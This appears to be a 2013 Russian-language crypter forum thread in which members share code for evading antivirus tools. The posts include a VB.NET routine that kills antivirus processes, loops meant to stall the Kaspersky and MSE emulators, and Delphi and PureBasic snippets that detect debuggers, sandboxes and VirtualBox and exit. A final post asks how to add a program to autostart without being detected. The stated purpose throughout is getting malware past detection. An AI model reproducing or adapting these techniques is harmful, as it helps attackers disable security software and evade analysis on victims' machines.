FuckAV - Форум о крипторах

Анонимный антивирусный сканер VPN-сервис
[Copi]Team DDoS Service

SEO статьи - блог от создателя FuckAV | KOROVKA.so | Качественный VPN Service MultiVPN - PPTP/OpenVPN/DoubleVPN

Реклама на форуме | Помощь форуму | Аварийный блог

Наш Jabber-сервер расположен по адресу fuckav.in. Добро пожаловать!!!

Вернуться  

Для того, чтобы ответить в теме, необходимо зарегистрироваться.
 
Опции темы Опции просмотра
Старый 08-01-2013   #1
Crash0w3r

Заблокирован

Последняя активность:
02-07-2013
Регистрация: 20.08.2012
Сообщений: 47
Поблагодарили всего: 106
за это сообщение: 2
Сообщение Anti

Код:
Dim local As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To local.Length - 1
Debug.WriteLine(local(i).ProcessName)
If Strings.UCase(local(i).ProcessName) = Strings.UCase("sample") Then 'Anubis
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("outpost") Then 'Outpost
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("npfmsg") Then 'Norman
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("bdagent") Then 'Bitdefender
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("kavsvc") Then 'Kaspersky
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("egui") Then 'Nod32
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("zlclient") Then 'Zonealarm
local(i).Kill()
End If
End If
End If
End If
End If
End If
End If
Next
Crash0w3r вне форума  
Сказали спасибо:
Dark Koder (21-06-2013), Аноним (09-01-2013)


Старый 19-06-2013   #2
kingmonstr

Windows v.1.01

Последняя активность:
10-07-2013
Регистрация: 29.12.2011
Сообщений: 11
Поблагодарили всего: 0
за это сообщение: 0
По умолчанию

А как же массивы? Хоть что-то интересное?
kingmonstr вне форума  
Старый 20-06-2013   #3
St.Patrick

Windows 100500

Последняя активность:
28-10-2013
Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 4
Jabber кому надо тот знает.
По умолчанию

мож кому пригодится, очень тупое затыкание эмулятора спермского и не только
Код:
  for i := 1 to 1000000 do begin
    Randomize;
    OutputDebugString(Pchar(IntToStr(GetAsyncKeyState(i)+random(1000))));
  end;
пример:
http://scanner.fuckav.ru/report.php?id=51c257c26b150 было
http://scanner.fuckav.ru/report.php?id=51c258a9a8281 стало

спермский и мсье заткнулись. мелочь, а приятно

была еще где-то функция детекта почти всех виртуалок, песочниц, и прочей срани. но я походу проебал ее если найду запилю сюда.

Последний раз редактировалось St.Patrick; 20-06-2013 в 04:22.
St.Patrick вне форума  
Сказали спасибо:
Dark Koder (21-06-2013), dzhoka (20-06-2013), POCT (20-06-2013), mazafaka2026 (20-06-2013)
Старый 20-06-2013   #4
vazonez

место для илитной подписи
 
Аватар для vazonez

Последняя активность:
07-12-2013
Регистрация: 23.08.2009
Сообщений: 377
Поблагодарили всего: 126
за это сообщение: 2
ICQ 331468
По умолчанию

Цитата:
Сообщение от St.Patrick Посмотреть сообщение
мож кому пригодится, очень тупое затыкание эмулятора спермского и не только
Код:
  for i := 1 to 1000000 do begin
    Randomize;
    OutputDebugString(Pchar(IntToStr(GetAsyncKeyState(i)+random(1000))));
  end;
пример:
http://scanner.fuckav.ru/report.php?id=51c257c26b150 было
http://scanner.fuckav.ru/report.php?id=51c258a9a8281 стало

спермский и мсье заткнулись. мелочь, а приятно

была еще где-то функция детекта почти всех виртуалок, песочниц, и прочей срани. но я походу проебал ее если найду запилю сюда.
Лол, такая простень - а MSE нахуй послало.
vazonez вне форума  
Сказали спасибо:
dzhoka (20-06-2013), St.Patrick (20-06-2013)
Старый 20-06-2013   #5
hdsckr

Windows ME
 
Аватар для hdsckr

Последняя активность:
17-05-2014
Регистрация: 20.04.2011
Сообщений: 230
Поблагодарили всего: 351
за это сообщение: 5
По умолчанию

Я делаю почти так же. Только ещё проще.

Цитата:

for i = 0 to 5000

trash.s + "abcdefg" + "abcdefg" + "abcdefg" + "abcdefg"

next
Вобще вырубает любые эмуляторы. Правда проц грузит тож не хило.

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 20 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.
__________________

Последний раз редактировалось hdsckr; 20-06-2013 в 18:44.
hdsckr вне форума  
Сказали спасибо:
St.Patrick (21-06-2013), Dark Koder (21-06-2013), POCT (21-06-2013), dzhoka (20-06-2013), † Voland † (20-06-2013)
Старый 20-06-2013   #6
vazonez

место для илитной подписи
 
Аватар для vazonez

Последняя активность:
07-12-2013
Регистрация: 23.08.2009
Сообщений: 377
Поблагодарили всего: 126
за это сообщение: 4
ICQ 331468
По умолчанию

hdsckr
Против анубиса всё еще катит чек параметра "SystemBiosVersion" в HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System - у них там "QEMU" или вроде того.
vazonez вне форума  
Сказали спасибо:
Dark Koder (21-06-2013), St.Patrick (21-06-2013), POCT (21-06-2013), hdsckr (20-06-2013)
Старый 21-06-2013   #7
upO

Заблокирован

Последняя активность:
17-02-2014
Регистрация: 11.05.2013
Сообщений: 188
Поблагодарили всего: 245
за это сообщение: 0
По умолчанию

Тру блек-хет метод, спёртый из Оптимы. Набегай!
Детект отладки//виртмашины (спизжено)

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 20 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.


Совсем забыл: юзать по таймеру с интервалом в сотку, ифками.
Соотвественно if isDBG = 1 then ExitProcess(0); // к примеру

*(вообще баян, но если немного подредачить - можно на основе этого что-нибудь да запилить )

Последний раз редактировалось upO; 21-06-2013 в 11:51.
upO вне форума  
Старый 21-06-2013   #8
St.Patrick

Windows 100500

Последняя активность:
28-10-2013
Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 0
Jabber кому надо тот знает.
По умолчанию

upO, всё кривые полу-рабочие баяны)
St.Patrick вне форума  
Старый 21-06-2013   #9
upO

Заблокирован

Последняя активность:
17-02-2014
Регистрация: 11.05.2013
Сообщений: 188
Поблагодарили всего: 245
за это сообщение: 0
По умолчанию

Цитата:
Сообщение от St.Patrick Посмотреть сообщение
upO, всё кривые полу-рабочие баяны)
Чекал лично - работает

Последний раз редактировалось upO; 21-06-2013 в 11:54.
upO вне форума  
Старый 21-06-2013   #10
St.Patrick

Windows 100500

Последняя активность:
28-10-2013
Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 0
Jabber кому надо тот знает.
По умолчанию

Цитата:
Сообщение от upO Посмотреть сообщение
Чекал лично - работает.
далеко не всё и не всегда..
St.Patrick вне форума  
Старый 21-06-2013   #11
upO

Заблокирован

Последняя активность:
17-02-2014
Регистрация: 11.05.2013
Сообщений: 188
Поблагодарили всего: 245
за это сообщение: 0
По умолчанию

Цитата:
Сообщение от St.Patrick Посмотреть сообщение
далеко не всё и не всегда..
Ну чекал на ХР с VirtBox - робило )

Последний раз редактировалось upO; 21-06-2013 в 11:53.
upO вне форума  
Старый 21-06-2013   #12
St.Patrick

Windows 100500

Последняя активность:
28-10-2013
Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 2
Jabber кому надо тот знает.
По умолчанию

ну да, ну да IN EAX, DX в р3 это вообще лол) далее IsInVPC на вистовой ос с урезанными правами скорее всего закончится падением. a IsDebuggerPresent это пиздец товарищи.
St.Patrick вне форума  
Сказали спасибо:
upO (21-06-2013), POCT (21-06-2013)
Старый 21-06-2013   #13
upO

Заблокирован

Последняя активность:
17-02-2014
Регистрация: 11.05.2013
Сообщений: 188
Поблагодарили всего: 245
за это сообщение: 0
По умолчанию

Ну, не я писал данный метод
Дружно ругаем автора оптимы

Последний раз редактировалось upO; 21-06-2013 в 11:53.
upO вне форума  
Старый 21-06-2013   #14
Dark Koder

Windows XP

Последняя активность:
2 недель(и) назад
Регистрация: 24.11.2009
Сообщений: 270
Поблагодарили всего: 130
за это сообщение: 0
ICQ 432871473
По умолчанию

upO, а будет продолжение с модулями Graphics,Registry и Alpha-Skin?
Все таки спс что вытянул и дал народу посмеятсо)) это же надо,как ныне обходы пилят.
Интересно,что скажут Апокалипс и Вазонез...
Dark Koder вне форума  
Старый 21-06-2013   #15
upO

Заблокирован

Последняя активность:
17-02-2014
Регистрация: 11.05.2013
Сообщений: 188
Поблагодарили всего: 245
за это сообщение: 2
По умолчанию

Всегда рад доставить немного лулзов

Последний раз редактировалось upO; 21-06-2013 в 11:50.
upO вне форума  
Сказали спасибо:
olegteror (24-07-2013), mazafaka2026 (21-06-2013)
Старый 21-06-2013   #16
hdsckr

Windows ME
 
Аватар для hdsckr

Последняя активность:
17-05-2014
Регистрация: 20.04.2011
Сообщений: 230
Поблагодарили всего: 351
за это сообщение: 5
По умолчанию

Антитрассировка

Цитата:

Procedure antitrace()

EnableASM

#RPL_MASK = %11

Trace.l

MOV cx,#RPL_MASK
PUSH gs
XOR eax,eax
MOV gs,cx
MOV ax,gs
MOV gs,cx
MOV dx,gs
MOV gs,cx
MOV cx,gs
ADD ax,cx
ADD ax,dx
SETZ al
POP gs
MOV Trace,eax



If Trace
INT 3
EndIf

EndProcedure
__________________

Последний раз редактировалось hdsckr; 21-06-2013 в 11:55.
hdsckr вне форума  
Сказали спасибо:
mazafaka2026 (21-06-2013), St.Patrick (21-06-2013), dzhoka (21-06-2013), POCT (21-06-2013), upO (21-06-2013)
Старый 22-06-2013   #17
St.Patrick

Windows 100500

Последняя активность:
28-10-2013
Регистрация: 30.04.2011
Сообщений: 196
Поблагодарили всего: 173
за это сообщение: 6
Jabber кому надо тот знает.
По умолчанию

Код:
if LoadLibraryA(Pchar('VBoxHook.dll')) <> 0 then ExitProcess(0);
if LoadLibraryA(Pchar('VBoxMRXNP.dll')) <> 0 then ExitProcess(0);
детект виртуалбокса, вроде не совсем баян с вмваре так же, только длл другие, не помню какие.

Код:
function IsDBGPresent: boolean; assembler;
asm
  mov eax, large fs:18h
  mov eax, [eax+30h]
  movzx eax, byte ptr [eax+2]
  cmp eax, 1
  jne @ret
  @true:
  mov Result, True
  @ret:
end;
аналог IsDebuggerPresent, но не каждый школьник поймет что это



Добавлено через 16 минут


еще виртуалбокс

Код:
function IsVirtualBox: boolean;
var
  hFile: Thandle;
begin
  Result := False;
  hFile := CreateFileA(Pchar('\\.\VBoxMiniRdrDN'), GENERIC_READ or GENERIC_WRITE, 0, nil, OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL, 0);
  if( hFile <> INVALID_HANDLE_VALUE ) then begin
    CloseHandle(hFile);
    Result := TRUE;
  end;
end;

Последний раз редактировалось St.Patrick; 22-06-2013 в 04:01. Причина: Добавлено сообщение
St.Patrick вне форума  
Сказали спасибо:
upO (28-10-2013), denis187500 (22-06-2013), POCT (22-06-2013), hdsckr (22-06-2013), mazafaka2026 (22-06-2013), dzhoka (22-06-2013)
Старый 23-07-2013   #18
mrOrwell

Windows v.3.1
 
Аватар для mrOrwell

Последняя активность:
27-03-2014
Регистрация: 18.07.2013
Сообщений: 49
Поблагодарили всего: 18
за это сообщение: 0
По умолчанию

А как записываться без палева в автозагрузку ? а обычную запись в реест палит дрвеб и прочие антивири - не хорошо получается =(
mrOrwell вне форума  
Для того, чтобы ответить в теме, необходимо зарегистрироваться.

Метки
begin, boolean, exitprocess, function, hfile


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Часовой пояс GMT +3, время: 04:09.



Powered by vBulletin® Copyright ©2000 - 2014, Jelsoft Enterprises Ltd. Перевод: zCarot
Други: SEO блог Deymos'a| ProLogic.Su| DServers.ru| Форум веб-мастеров